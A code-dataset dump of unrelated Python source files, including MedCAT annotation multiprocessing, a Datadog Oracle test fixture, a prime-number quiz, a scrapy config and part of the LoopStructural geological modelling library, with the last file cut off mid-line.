out_ent['meta_anns'] = []\n for key in ent._.meta_anns.keys():\n one = {'name': key, 'value': ent._.meta_anns[key]}\n out_ent['meta_anns'].append(one) \n\n out.append(dict(out_ent))\n else:\n out.append(cui)\n\n return out\n\n\n def get_json(self, text, cat_filter=None, only_cui=False):\n \"\"\" Get output in json format\n\n text: text to be annotated\n return: json with fields {'entities': <>, 'text': text}\n \"\"\"\n ents = self.get_entities(text, cat_filter, only_cui)\n out = {'entities': ents, 'text': text}\n\n return json.dumps(out)\n\n\n def multi_processing(self, in_data, nproc=8, batch_size=100, cat_filter=None, only_cui=False):\n \"\"\" Run multiprocessing NOT FOR TRAINING\n in_data: an iterator or array with format: [(id, text), (id, text), ...]\n nproc: number of processors\n batch_size: obvious\n\n return: an list of tuples: [(id, doc_json), (id, doc_json), ...]\n \"\"\"\n\n if self._meta_annotations:\n # Hack for torch using multithreading, which is not good here\n import torch\n torch.set_num_threads(1)\n\n # Create the input output for MP\n in_q = Queue(maxsize=4*nproc)\n manager = Manager()\n out_dict = manager.dict()\n out_dict['processed'] = []\n\n # Create processes\n procs = []\n for i in range(nproc):\n p = Process(target=self._mp_cons, args=(in_q, out_dict, i, cat_filter, only_cui))\n p.start()\n procs.append(p)\n\n data = []\n for id, text in in_data:\n data.append((id, text))\n if len(data) == batch_size:\n in_q.put(data)\n data = []\n # Put the last batch if it exists\n if len(data) > 0:\n in_q.put(data)\n\n for _ in range(nproc): # tell workers we're done\n in_q.put(None)\n\n for p in procs:\n p.join()\n\n # Close the queue as it can cause memory leaks\n in_q.close()\n\n out = []\n for key in out_dict.keys():\n if 'pid' in key:\n data = out_dict[key]\n out.extend(data)\n\n # Sometimes necessary to free memory\n out_dict.clear()\n del out_dict\n\n return out\n\n\n def _mp_cons(self, in_q, out_dict, pid=0, cat_filter=None, only_cui=False):\n cnt = 0\n out = []\n while True:\n if not in_q.empty():\n data = in_q.get()\n if data is None:\n out_dict['pid: {}'.format(pid)] = out\n break\n\n for id, text in data:\n try:\n doc = json.loads(self.get_json(text, cat_filter, only_cui))\n out.append((id, doc))\n except Exception as e:\n print(\"Exception in _mp_cons\")\n print(e)\n\n sleep(1)\n","sub_path":"medcat/cat.py","file_name":"cat.py","file_ext":"py","file_size_in_byte":22014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"269309849","text":"# (C) Datadog, Inc. 2018\n# All rights reserved\n# Licensed under a 3-clause BSD style license (see LICENSE)\nimport os\n\nimport pytest\n\nfrom datadog_checks.dev.ssh_tunnel import tcp_tunnel\nfrom datadog_checks.dev.terraform import terraform_run\nfrom datadog_checks.dev.utils import get_here\nfrom datadog_checks.oracle import Oracle\n\nHERE = os.path.dirname(os.path.abspath(__file__))\nCHECK_NAME = \"oracle\"\n\n\n@pytest.fixture\ndef check():\n return Oracle(CHECK_NAME, {}, {})\n\n\n@pytest.fixture\ndef instance():\n return {\n 'server': 'localhost:1521',\n 'user': 'system',\n 'password': 'oracle',\n 'service_name': 'xe',\n 'tags': ['optional:tag1'],\n }\n\n\n@pytest.fixture(scope='session')\ndef dd_environment():\n with terraform_run(os.path.join(get_here(), 'terraform')) as outputs:\n ip = outputs['ip']['value']\n private_key = outputs['ssh_private_key']['value']\n with tcp_tunnel(ip, 'oracle', private_key, 1521) as tunnel:\n ip, port = tunnel\n env_instance = {\n 'server': '{}:{}'.format(ip, port),\n 'user': 'datadog',\n 'password': 'Oracle123',\n 'service_name': 'orcl.c.datadog-integrations-lab.internal',\n }\n yield env_instance, E2E_METADATA\n\n\nE2E_METADATA = {\n 'start_commands': [\n 'mkdir /opt/oracle',\n 'apt-get update',\n 'apt-get install libaio1 unzip',\n 'curl -o /opt/oracle/instantclient.zip '\n 'https://storage.googleapis.com/datadog-integrations-lab/instantclient-basiclite-linux.x64-19.3.0.0.0dbru.zip',\n 'unzip /opt/oracle/instantclient.zip -d /opt/oracle',\n ],\n 'env_vars': {'LD_LIBRARY_PATH': '/opt/oracle/instantclient_19_3'},\n}\n","sub_path":"oracle/tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":1745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"320477719","text":"import psutil\nimport os\nimport time\n\nuser = \"set\"\ncnt = 0\ndef chxpids(user):\n\tcnt = 0\n\tfor proc in psutil.process_iter():\n\t\tp = proc.as_dict(attrs=['pid', 'username'])\n\t\tif p['username'] == user:\n\t\t\tcnt=cnt + 1\n\t\tif cnt >= 5:\n\t\t\tos.kill(p['pid'], 9)\n\nwhile 1:\n\tchxpids(user)\n\ttime.sleep(1)\n","sub_path":"python/process-choke.py","file_name":"process-choke.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"523451824","text":"# Matplotlib\nfrom matplotlib import pyplot as plt\n\ndef plot_features(validation_examples,validation_targets,training_examples,training_targets) :\n plt.figure(figsize=(13, 8))\n\n ax = plt.subplot(1, 2, 1)\n ax.set_title(\"Validation Data\")\n\n ax.set_autoscaley_on(False)\n ax.set_ylim([32, 43]) # limit y\n ax.set_autoscalex_on(False)\n ax.set_xlim([-126, -112]) # limit x\n plt.scatter(validation_examples[\"origin.x\"],\n validation_examples[\"origin.y\"],\n cmap=\"coolwarm\",\n c=validation_targets[\"hit\"])\n\n ax = plt.subplot(1,2,2)\n ax.set_title(\"Training Data\")\n\n ax.set_autoscaley_on(False) \n ax.set_ylim([32, 43]) # limit y\n ax.set_autoscalex_on(False)\n ax.set_xlim([-126, -112]) # limit x\n plt.scatter(training_examples[\"origin.x\"],\n training_examples[\"origin.y\"],\n cmap=\"coolwarm\",\n c=training_targets[\"hit\"])\n _ = plt.plot()\n plt.show()","sub_path":"tensorflow/models/LinearClassifier/dataPlotter.py","file_name":"dataPlotter.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"478579100","text":"import os\nfrom PySide.QtCore import Signal, QObject, QTimer\nfrom ..downloads.series import DownloadSeries\nfrom ..downloads.subtitles import DownloadSubtitle\nfrom ..models import SeriesEntry\nfrom ..utils import ticked\nfrom .. import const\nfrom .base import BaseWorkerThread\n\n\nclass DownloadsWorker(QObject):\n \"\"\"Series list worker\"\"\"\n need_download = Signal(SeriesEntry, int)\n downloaded = Signal(SeriesEntry, int)\n download_progress = Signal(SeriesEntry, float)\n\n def __init__(self, *args, **kwargs):\n super(DownloadsWorker, self).__init__(*args, **kwargs)\n self.subtitles = DownloadSubtitle()\n self.series = DownloadSeries()\n self.need_download.connect(self._download)\n\n def _update_pause_state(self, entry, handler):\n \"\"\"Update pause state\"\"\"\n if entry.pause_state == const.NEED_PAUSE:\n handler.pause()\n entry.pause_state = const.NORMAL\n elif entry.pause_state == const.NEED_RESUME:\n handler.resume()\n entry.pause_state = const.NORMAL\n\n @ticked\n def _download(self, entry, tick):\n \"\"\"Get series\"\"\"\n handler = self.series.download(entry)\n entry.subtitle.series = entry\n if entry.subtitle.wait_for_file:\n entry.subtitle.downloaded = False\n else:\n self.subtitles.download(entry.subtitle)\n\n def _check_download():\n if (\n entry.subtitle.wait_for_file and\n not entry.subtitle.downloaded\n and os.path.exists(entry.path)\n ):\n self.subtitles.download(entry.subtitle)\n if entry.stop_download:\n handler.remove()\n entry.remove_file()\n self._update_pause_state(entry, handler)\n if handler.finished or entry.stop_download:\n self.downloaded.emit(entry, tick)\n else:\n QTimer.singleShot(100, _check_download)\n self.download_progress.emit(entry, handler.percent)\n _check_download()\n\n\nclass DownloadsWorkerThread(BaseWorkerThread):\n \"\"\"Downloads worker\"\"\"\n worker = DownloadsWorker\n","sub_path":"series_list/workers/downloads.py","file_name":"downloads.py","file_ext":"py","file_size_in_byte":2156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"132248643","text":"# DO *NOT* WRITE YOUR NAME TO MAINTAIN ANONYMITY FOR PLAGIARISM DETECTION\n\n\nfrom math import sqrt\nfrom itertools import permutations\n\n\ndef is_prime(n):\n if n <= 1:\n return False\n if n <= 3:\n return True\n if n % 2 == 0:\n return False\n # Only used to test odd numbers.\n return all(n % d for d in range(3, round(n ** 0.5) + 1, 2))\n\n\ndef first_sieve_of_primes_up_to(n):\n sieve = list(range(2, n + 1))\n i = 0\n while sieve[i] <= round(sqrt(n)):\n k = 0\n while True:\n factor = sieve[i] * sieve[i + k]\n if factor > n:\n break\n while factor <= n:\n sieve.remove(factor)\n factor *= sieve[i]\n k += 1\n i += 1\n return sieve\n\n\ndef second_sieve_of_primes_up_to(n):\n sieve = list(range(2, n + 1))\n i = 0\n while sieve[i] <= round(sqrt(n)):\n sieve_as_set = set(sieve)\n k = 0\n while True:\n factor = sieve[i] * sieve[i + k]\n if factor > n:\n break\n sieve_as_set.remove(factor)\n k += 1\n sieve = sorted(sieve_as_set)\n i += 1\n return sieve\n\n\n# 没有0,数字不重复,素数\n# A number is a good prime if it is prime and consists of nothing but\n# distinct nonzero digits.\n# Returns True or False depending on whether the integer provided as\n# argument is or is not a good prime, respectively.\n# Will be tested with for number a positive integer at most equal to\n# 10_000_000.\ndef is_good_prime(number):\n # REPLACE PASS ABOVE WITH YOUR CODE\n # if str(number).count('0') > 0 or len(set(str(number))) != len(str(number)):\n # 没有0,数字不重复,素数\n return False if '0' in str(number) or len(set(str(number))) != len(str(number)) else is_prime(number)\n\n\n# pattern is expected to be a nonempty string consisting of underscores\n# and digits of length at most 7.\n# Underscores have to be replaced by digits so that the resulting number\n# is the smallest good prime, in case it exists.\n# The function returns that number if it exists, None otherwise.\ndef smallest_good_prime(pattern):\n # REPLACE PASS ABOVE WITH YOUR CODE\n # 没有0,数字不重复,最小的good素数\n result = None\n if '0' in pattern:\n return result\n # check完整的数字\n if '_' not in pattern:\n if is_good_prime(int(pattern)):\n result = int(pattern)\n return result\n\n # check重复的数字\n # 是否存在重复的数据\n #\n if [1 for item in pattern if item != '_' and pattern.count(item) > 1]:\n return None\n\n all_digits = list('123456789')\n pattern_digits = set(pattern.replace('_', ''))\n\n # _12_ 3456789\n # 3124\n # 4123\n pattern_left_digits = list(sorted(set(all_digits) - pattern_digits))\n # 2\n underscore_count = pattern.count(\"_\")\n permutations_result = permutations(pattern_left_digits, underscore_count)\n for items in permutations_result:\n number = get_number_by_items(pattern, items)\n if is_good_prime(number):\n print(pattern, number)\n return number\n return None\n\n\n# POSSIBLY DEFINE OTHER FUNCTIONS\ndef get_number_by_items(pattern, items):\n pattern_list = list(pattern)\n index = 0\n for underscore_index in range(len(pattern_list)):\n if pattern_list[underscore_index] == '_':\n pattern_list[underscore_index] = items[index]\n index += 1\n # 执行完for循环之后\n # pattern_list = ['3','1','2','4']\n number = int(\"\".join(pattern_list))\n return number\n\n\nif __name__ == \"__main__\":\n smallest_good_prime('_0_')\n smallest_good_prime('2_2')\n smallest_good_prime('123')\n smallest_good_prime('_98')\n smallest_good_prime('3167')\n smallest_good_prime('__')\n smallest_good_prime('___')\n smallest_good_prime('1_7')\n smallest_good_prime('_89')\n smallest_good_prime('_89_')\n smallest_good_prime('_2_4_')\n smallest_good_prime('1__4_7')\n","sub_path":"Quiz/04/quiz_4.py","file_name":"quiz_4.py","file_ext":"py","file_size_in_byte":3989,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"445972143","text":"from pug.crawler.models import WikiItem as Item\r\nimport numpy as np\r\n\r\n# a [10000 x num_predictors] matrix inversion is intractible, so don't dare try it\r\nMAX_NUM_RECORDS = 10000\r\n\r\n\r\ndef predictor_values(predictors=None, filter_dict=None, exclude_dict=None, predicted='wikiitem.modified', max_num_records=10000):\r\n from collections import OrderedDict as OD\r\n if predictors is None:\r\n # values in the database retrieved for assignment to values in an array of data for the fit\r\n predictors = (\r\n # Name, Django ORM queryset record python expression\r\n ('modified', 'title'),\r\n ('crawled', 'modified'),\r\n )\r\n predictors = OD(predictors)\r\n # if filter_dict is None:\r\n # # subset of the data to perform the multivariate linear regression on\r\n # filter_dict = (('serial_number__isnot', 'TRUNCATED'),)\r\n # filter_dict = OD(filter_dict)\r\n\r\n qs = Item.objects\r\n if filter_dict:\r\n qs = qs.filter(**filter_dict)\r\n if exclude_dict:\r\n qs = qs.exclude(**exclude_dict)\r\n qs = qs.all()\r\n\r\n # predictor variable values, one row for each variable, a column for each record in the queryset (value of the predictor)\r\n X = []\r\n\r\n import math\r\n\r\n math_env = dict([(name, getattr(math, name, lambda x: x)) for name in math.__dict__ if not name.startswith('__')])\r\n blacklist = ['credits', 'del', 'delattr', 'dir', 'dreload', 'file', 'frozenset', 'get_ipython', 'make_option', 'os', 'sys', 'eval', 'globals', 'locals', 'open', 'exec', 'execfile']\r\n whitelist = ['sum', 'pow', 'float', 'int', 'floor', 'len', 'list', 'max', 'min', 'oct', 'ord', 'tuple', 'dict', 'str', 'unicode', 'type', 'isinstance', 'hex', 'ord', 'hash']\r\n global_env = dict([(name, __builtins__.get(name, lambda x: x)) for name in __builtins__ if name in whitelist and name not in blacklist and not name.startswith('__')])\r\n\r\n safe_env = {\r\n \"locals\": None,\r\n \"globals\": None,\r\n \"__name__\": None,\r\n \"__file__\": None,\r\n \"__builtins__\": None,\r\n }\r\n\r\n safe_env.update(global_env)\r\n safe_env.update(math_env)\r\n\r\n N = min(max_num_records, qs.count(), MAX_NUM_RECORDS)\r\n y = []\r\n\r\n for record in qs[:N]:\r\n X += [[]]\r\n for name, expression in predictors.iteritems():\r\n safe_env['case'] = record\r\n X[-1] += [eval(expression, safe_env)]\r\n y += [eval(predicted, safe_env)]\r\n\r\n return X, y\r\n\r\n\r\ndef compute_fit(predictor_matrix, predicted_values):\r\n A = np.matrix(predictor_matrix)\r\n y = np.hstack(predicted_values)\r\n beta = np.linalg.lstsq(A, y)\r\n return beta\r\n\r\n\r\ndef demo():\r\n import nlp.plotter\r\n A, y = predictor_values()\r\n beta, residuals, rank, singular_values = compute_fit(A, y)\r\n nlp.plotter.regressionplot(A, y, (beta, residuals, rank, singular_values))\r\n","sub_path":"pug/nlp/mvlr.py","file_name":"mvlr.py","file_ext":"py","file_size_in_byte":2866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"309836396","text":"\nimport redis\nBOT_NAME = 'xinlang_scrapy'\n\nSPIDER_MODULES = ['xinlang_scrapy.spiders']\nNEWSPIDER_MODULE = 'xinlang_scrapy.spiders'\n\n\n# Crawl responsibly by identifying yourself (and your website) on the user-agent\nUSER_AGENT = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36'\n\n\n# Obey robots.txt rules\nROBOTSTXT_OBEY = False\n\n\nDOWNLOADER_MIDDLEWARES = {\n 'xinlang_scrapy.middlewares.UserAgentMiddleware': 543,\n}\nITEM_PIPELINES = {\n 'xinlang_scrapy.pipelines.XinlangScrapyPipeline': 300,\n}\npool = redis.ConnectionPool(host='localhost', port=6379, decode_responses=True)\nr = redis.Redis(connection_pool=pool,decode_responses=True)\n\nDAY = 7\n","sub_path":"2.爬虫/新浪搜索/xinlang_scrapy/xinlang_scrapy/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"206816075","text":"# author : koristo1@fit.cvut.cz\nimport argparse\n\nfrom src.preprocessor import preprocess_collection\n\nparser = argparse.ArgumentParser(description=\"Collection preprocessing\")\nparser.add_argument(\"-i\", \"--input\", type=str, help=\"Path to the input collection directory\")\nparser.add_argument(\"-o\", \"--output\", type=str, help=\"Path to the output database file\")\nparser.add_argument(\"-f\", \"--frequency\", type=str, help=\"Path to the output frequency file\")\nargs = parser.parse_args()\npreprocess_collection(args.input, args.frequency, args.output)\n","sub_path":"preprocessing/src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"363261925","text":"import logging\n\nimport numpy as np\nimport pandas as pd\n\nfrom LoopStructural.datasets import normal_vector_headers\nfrom LoopStructural.interpolators.discrete_fold_interpolator import \\\n DiscreteFoldInterpolator as DFI\nfrom LoopStructural.interpolators.finite_difference_interpolator import \\\n FiniteDifferenceInterpolator as FDI\nfrom LoopStructural.interpolators.piecewiselinear_interpolator import \\\n PiecewiseLinearInterpolator as PLI\n\ntry:\n from LoopStructural.interpolators.surfe_wrapper import \\\n SurfeRBFInterpolator as Surfe\n\n surfe = True\n\nexcept ImportError:\n surfe = False\n\nfrom LoopStructural.utils.helper import all_heading, gradient_vec_names, \\\n strike_dip_vector\nfrom LoopStructural.modelling.fault.fault_segment import FaultSegment\nfrom LoopStructural.modelling.features import \\\n GeologicalFeatureInterpolator\nfrom LoopStructural.modelling.features import RegionFeature\nfrom LoopStructural.modelling.features import \\\n StructuralFrameBuilder\nfrom LoopStructural.modelling.features import UnconformityFeature\nfrom LoopStructural.modelling.fold.fold import FoldEvent\nfrom LoopStructural.modelling.fold import FoldRotationAngle\nfrom LoopStructural.modelling.fold.foldframe import FoldFrame\nfrom LoopStructural.interpolators.structured_grid import StructuredGrid\nfrom LoopStructural.interpolators.structured_tetra import TetMesh\nfrom LoopStructural.utils.exceptions import LoopBaseException\n\nlogger = logging.getLogger(__name__)\nif not surfe:\n logger.warning(\"Cannot import Surfe\")\n\n\ndef _calculate_average_intersection(series_builder, fold_frame, fold,\n **kwargs):\n \"\"\"\n\n Parameters\n ----------\n series_builder\n fold_frame\n fold\n\n Returns\n -------\n\n \"\"\"\n l2 = fold_frame.calculate_intersection_lineation(\n series_builder)\n fold.fold_axis = np.mean(l2, axis=0)\n\n\nclass GeologicalModel:\n \"\"\"\n A geological model is the recipe for building a 3D model and includes\n the rescaling\n of the model between 0 and 1.\n \"\"\"\n def __init__(self, origin, maximum, rescale=True, nsteps=(40, 40, 40),\n reuse_supports=False):\n \"\"\"\n Parameters\n ----------\n origin : numpy array\n specifying the origin of the model\n maximum : numpy array\n specifying the maximum extent of the model\n rescale : bool\n whether to rescale the model to between 0/1\n\n \"\"\"\n self.features = []\n self.feature_name_index = {}\n self.data = None\n self.nsteps = nsteps\n\n # we want to rescale the model area so that the maximum length is\n # 1\n self.origin = np.array(origin).astype(float)\n\n self.maximum = np.array(maximum).astype(float)\n lengths = self.maximum - self.origin\n self.scale_factor = 1.\n self.bounding_box = np.zeros((2, 3))\n self.bounding_box[1, :] = self.maximum - self.origin\n self.bounding_box[1, :] = self.maximum - self.origin\n if rescale:\n self.scale_factor = np.max(lengths)\n\n self.bounding_box /= self.scale_factor\n self.support = {}\n self.reuse_supports = reuse_supports\n self.stratigraphic_column = None\n self.parameters = {'features': [], 'model': {'bounding_box': self.origin.tolist() + self.maximum.tolist(),\n 'rescale': rescale,\n 'nsteps': nsteps,\n 'reuse_supports': reuse_supports}}\n\n @classmethod\n def from_map2loop_directory(cls, m2l_directory,**kwargs):\n \"\"\"Alternate constructor for a geological model using m2l output\n\n Uses the information saved in the map2loop files to build a geological model.\n You can specify kwargs for building foliation using foliation_params and for \n faults using fault_params. skip_faults is a flag that allows for the faults to be skipped.\n\n Parameters\n ----------\n m2l_directory : string\n path to map2loop directory\n\n Returns\n -------\n (GeologicalModel, dict)\n the created geological model and a dictionary of the map2loop data\n \"\"\"\n from LoopStructural.utils import process_map2loop, build_model\n m2l_data = process_map2loop(m2l_directory)\n return build_model(m2l_data,**kwargs), m2l_data\n\n def _add_feature(self, feature):\n \"\"\"\n Add a feature to the model stack\n\n Parameters\n ----------\n feature : GeologicalFeature\n the geological feature to add\n\n \"\"\"\n\n if feature.name in self.feature_name_index:\n logger.info(\"Feature %s already exists at %i, overwriting\" %\n (feature.name, self.feature_name_index[feature.name]))\n self.features[self.feature_name_index[feature.name]] = feature\n else:\n self.features.append(feature)\n self.feature_name_index[feature.name] = len(self.features) - 1\n logger.info(\"Adding %s to model at location %i\" % (\n feature.name, len(self.features)))\n self._add_domain_fault_above(feature)\n self._add_unconformity_above(feature)\n feature.set_model(self)\n\n def set_model_data(self, data):\n \"\"\"\n Set the data array for the model\n\n Parameters\n ----------\n data : pandas data frame\n with column headers corresponding to the\n type, X, Y, Z, nx, ny, nz, val, strike, dip, dip_dir, plunge,\n plunge_dir, azimuth\n\n Returns\n -------\n Note\n ----\n Type can be any unique identifier for the feature the data point\n 'eg' 'S0', 'S2', 'F1_axis'\n it is then used by the create functions to get the correct data\n \"\"\"\n if type(data) != pd.DataFrame:\n logger.warning(\n \"Data is not a pandas data frame, trying to read data frame \"\n \"from csv\")\n try:\n data = pd.read_csv(data)\n except:\n logger.error(\"Could not load pandas data frame from data\")\n\n self.data = data.copy()\n self.data['X'] -= self.origin[0]\n self.data['Y'] -= self.origin[1]\n self.data['Z'] -= self.origin[2]\n self.data['X'] /= self.scale_factor\n self.data['Y'] /= self.scale_factor\n self.data['Z'] /= self.scale_factor\n if 'type' in self.data:\n logger.warning(\"'type' is being replaced with 'feature_name' \\n\")\n self.data.rename(columns={'type':'feature_name'},inplace=True)\n for h in all_heading():\n if h not in self.data:\n self.data[h] = np.nan\n if h == 'w':\n self.data[h] = 1.\n if h == 'coord':\n self.data[h] = 0\n \n if 'strike' in self.data and 'dip' in self.data:\n mask = np.all(~np.isnan(self.data.loc[:, ['strike', 'dip']]),\n axis=1)\n self.data.loc[mask, gradient_vec_names()] = strike_dip_vector(\n self.data.loc[mask, 'strike'], self.data.loc[mask, 'dip'])\n self.data.drop(['strike', 'dip'], axis=1, inplace=True)\n # self.data.loc\n\n def extend_model_data(self, newdata):\n \"\"\"\n Extends the data frame\n\n Parameters\n ----------\n newdata : pandas data frame\n data to add to the existing dataframe\n Returns\n -------\n \"\"\"\n logger.warning(\"Extend data is untested and may have unexpected consequences\")\n data_temp = newdata.copy()\n data_temp['X'] -= self.origin[0]\n data_temp['Y'] -= self.origin[1]\n data_temp['Z'] -= self.origin[2]\n data_temp['X'] /= self.scale_factor\n data_temp['Y'] /= self.scale_factor\n data_temp['Z'] /= self.scale_factor\n self.data.concat([self.data, data_temp], sort=True)\n\n def set_stratigraphic_column(self, stratigraphic_column):\n \"\"\"\n Adds a stratigraphic column to the model\n\n Parameters\n ----------\n stratigraphic_column : dictionary\n\n Returns\n -------\n\n Notes\n -----\n stratigraphic_column is a nested dictionary with the format\n {'group':\n {'series1':\n {'min':0., 'max':10.,'id':0}\n }\n }\n\n \"\"\"\n self.stratigraphic_column = stratigraphic_column\n\n def create_from_feature_list(self, features):\n for f in features:\n featuretype = f.pop('featuretype', None)\n if featuretype is None:\n raise LoopBaseException\n if featuretype == 'strati':\n self.create_and_add_foliation(f)\n # if featuretype == 'fault':\n # self.create_and_add_fault(f)\n if featuretype == 'folded_strati':\n self.create_and_add_folded_foliation(f)\n\n def get_interpolator(self, interpolatortype='PLI', nelements=5e5,\n buffer=0.2, **kwargs):\n \"\"\"\n Returns an interpolator given the arguments, also constructs a\n support for a discrete interpolator\n\n Parameters\n ----------\n interpolatortype : string\n define the interpolator type\n nelements : int\n number of elements in the interpolator\n buffer : double or numpy array 3x1\n value(s) between 0,1 specifying the buffer around the bounding box\n data_bb : bool\n whether to use the model boundary or the boundary around\n kwargs : no kwargs used, this just catches any additional arguments\n\n Returns\n -------\n \"\"\"\n # get an interpolator for\n interpolator = None\n bb = np.copy(self.bounding_box)\n # add a buffer to the interpolation domain, this is necessary for\n # faults but also generally a good\n # idea to avoid boundary problems\n bb[0, :] -= buffer # *(bb[1,:]-bb[0,:])\n bb[1, :] += buffer # *(bb[1,:]-bb[0,:])\n if interpolatortype == \"PLI\":\n nelements /= 5\n ele_vol = bb[1, 0] * bb[1, 1] * bb[1, 2] / nelements\n # calculate the step vector of a regular cube\n step_vector = np.zeros(3)\n step_vector[:] = ele_vol ** (1. / 3.)\n # number of steps is the length of the box / step vector\n nsteps = ((bb[1, :] - bb[0, :]) / step_vector).astype(int)\n # create a structured grid using the origin and number of steps\n mesh_id = 'mesh_{}'.format(nelements)\n mesh = self.support.get(mesh_id,\n TetMesh(origin=bb[0, :], nsteps=nsteps,\n step_vector=step_vector))\n if mesh_id not in self.support:\n self.support[mesh_id] = mesh\n logger.info(\"Creating regular tetrahedron mesh with %i elements \\n\"\n \"for modelling using PLI\" % (mesh.ntetra))\n\n return PLI(mesh)\n\n if interpolatortype == 'FDI':\n # find the volume of one element\n ele_vol = bb[1, 0] * bb[1, 1] * bb[1, 2] / nelements\n # calculate the step vector of a regular cube\n step_vector = np.zeros(3)\n step_vector[:] = ele_vol ** (1. / 3.)\n # number of steps is the length of the box / step vector\n nsteps = ((bb[1, :] - bb[0, :]) / step_vector).astype(int)\n # create a structured grid using the origin and number of steps\n grid_id = 'grid_{}'.format(nelements)\n grid = self.support.get(grid_id, StructuredGrid(origin=bb[0, :],\n nsteps=nsteps,\n step_vector=step_vector))\n if grid_id not in self.support:\n self.support[grid_id] = grid\n logger.info(\"Creating regular grid with %i elements \\n\"\n \"for modelling using FDI\" % grid.n_elements)\n return FDI(grid)\n\n if interpolatortype == \"DFI\": # \"fold\" in kwargs:\n nelements /= 5\n ele_vol = bb[1, 0] * bb[1, 1] * bb[1, 2] / nelements\n # calculate the step vector of a regular cube\n step_vector = np.zeros(3)\n step_vector[:] = ele_vol ** (1. / 3.)\n # number of steps is the length of the box / step vector\n nsteps = ((bb[1, :] - bb[0, :]) / step_vector).astype(int)\n # create a structured grid using the origin and number of steps\n mesh = kwargs.get('mesh', TetMesh(origin=bb[0, :], nsteps=nsteps,\n step_vector=step_vector))\n logger.info(\"Creating regular tetrahedron mesh with %i elements \\n\"\n \"for modelling using DFI\" % mesh.ntetra)\n return DFI(mesh, kwargs['fold'])\n if interpolatortype == 'Surfe' or interpolatortype == 'surfe' and \\\n surfe:\n method = kwargs.get('method', 'single_surface')\n logger.info(\"Using surfe interpolator\")\n return Surfe(method)\n logger.warning(\"No interpolator\")\n return interpolator\n\n def create_and_add_foliation(self, series_surface_data, **kwargs):\n \"\"\"\n Parameters\n ----------\n series_surface_data : string\n corresponding to the feature_name in the data\n kwargs\n\n Returns\n -------\n feature : GeologicalFeature\n the created geological feature\n \"\"\"\n self.parameters['features'].append({'feature_type': 'foliation', 'feature_name': series_surface_data, **kwargs})\n interpolator = self.get_interpolator(**kwargs)\n series_builder = GeologicalFeatureInterpolator(interpolator,\n name=series_surface_data,\n **kwargs)\n # add data\n series_data = self.data[self.data['feature_name'] == series_surface_data]\n if series_data.shape[0] == 0:\n logger.warning(\"No data for %s, skipping\" % series_surface_data)\n return\n series_builder.add_data_from_data_frame(series_data)\n self._add_faults(series_builder)\n\n # build feature\n series_feature = series_builder.build(**kwargs)\n series_feature.type = 'series'\n # see if any unconformities are above this feature if so add region\n # self._add_unconformity_above(series_feature)self._add_feature(series_feature)\n self._add_feature(series_feature)\n return series_feature\n\n def create_and_add_fold_frame(self, foldframe_data, **kwargs):\n \"\"\"\n Parameters\n ----------\n foldframe_data : string\n unique string in feature_name column\n\n kwargs\n\n Returns\n -------\n fold_frame : FoldFrame\n the created fold frame\n \"\"\"\n self.parameters['features'].append({'feature_type': 'fold_frame', 'feature_name': foldframe_data, **kwargs})\n result = {}\n # create fault frame\n interpolator = self.get_interpolator(**kwargs)\n #\n fold_frame_builder = StructuralFrameBuilder(interpolator,\n name=foldframe_data,\n **kwargs)\n # add data\n fold_frame_data = self.data[self.data['feature_name'] == foldframe_data]\n fold_frame_builder.add_data_from_data_frame(fold_frame_data)\n self._add_faults(fold_frame_builder[0])\n self._add_faults(fold_frame_builder[1])\n self._add_faults(fold_frame_builder[2])\n\n fold_frame = fold_frame_builder.build(frame=FoldFrame, **kwargs)\n # for i in range(3):\n # self._add_unconformity_above(fold_frame[i])\n fold_frame.type = 'structuralframe'\n self._add_feature(fold_frame)\n \n return fold_frame\n\n def create_and_add_folded_foliation(self, foliation_data, fold_frame=None,\n **kwargs):\n \"\"\"\n Create a folded foliation field from data and a fold frame\n\n Parameters\n ----------\n foliation_data : string\n unique string in type column of data frame\n fold_frame : FoldFrame\n kwargs\n additional kwargs to be passed through to other functions\n\n Returns\n -------\n feature : GeologicalFeature\n created geological feature\n \"\"\"\n self.parameters['features'].append(\n {'feature_type': 'fold_foliation', 'feature_name': foliation_data, 'fold_frame': fold_frame, **kwargs})\n if fold_frame is None:\n logger.info(\"Using last feature as fold frame\")\n fold_frame = self.features[-1]\n assert type(fold_frame) == FoldFrame, \"Please specify a FoldFrame\"\n fold = FoldEvent(fold_frame)\n fold_interpolator = self.get_interpolator(\"DFI\", fold=fold, **kwargs)\n series_builder = GeologicalFeatureInterpolator(\n interpolator=fold_interpolator,\n name=foliation_data)\n\n series_builder.add_data_from_data_frame(\n self.data[self.data['feature_name'] == foliation_data])\n self._add_faults(series_builder)\n\n series_builder.add_data_to_interpolator(True)\n if \"fold_axis\" in kwargs:\n fold.fold_axis = kwargs['fold_axis']\n if \"av_fold_axis\" in kwargs:\n _calculate_average_intersection(series_builder, fold_frame, fold)\n if fold.fold_axis is None:\n far, fad = fold_frame.calculate_fold_axis_rotation(\n series_builder)\n fold_axis_rotation = FoldRotationAngle(far, fad)\n a_wl = kwargs.get(\"axis_wl\", None)\n if 'axis_function' in kwargs:\n # allow predefined function to be used\n fold_axis_rotation.set_function(kwargs['axis_function'])\n else:\n fold_axis_rotation.fit_fourier_series(wl=a_wl)\n fold.fold_axis_rotation = fold_axis_rotation\n # give option of passing own fold limb rotation function\n flr, fld = 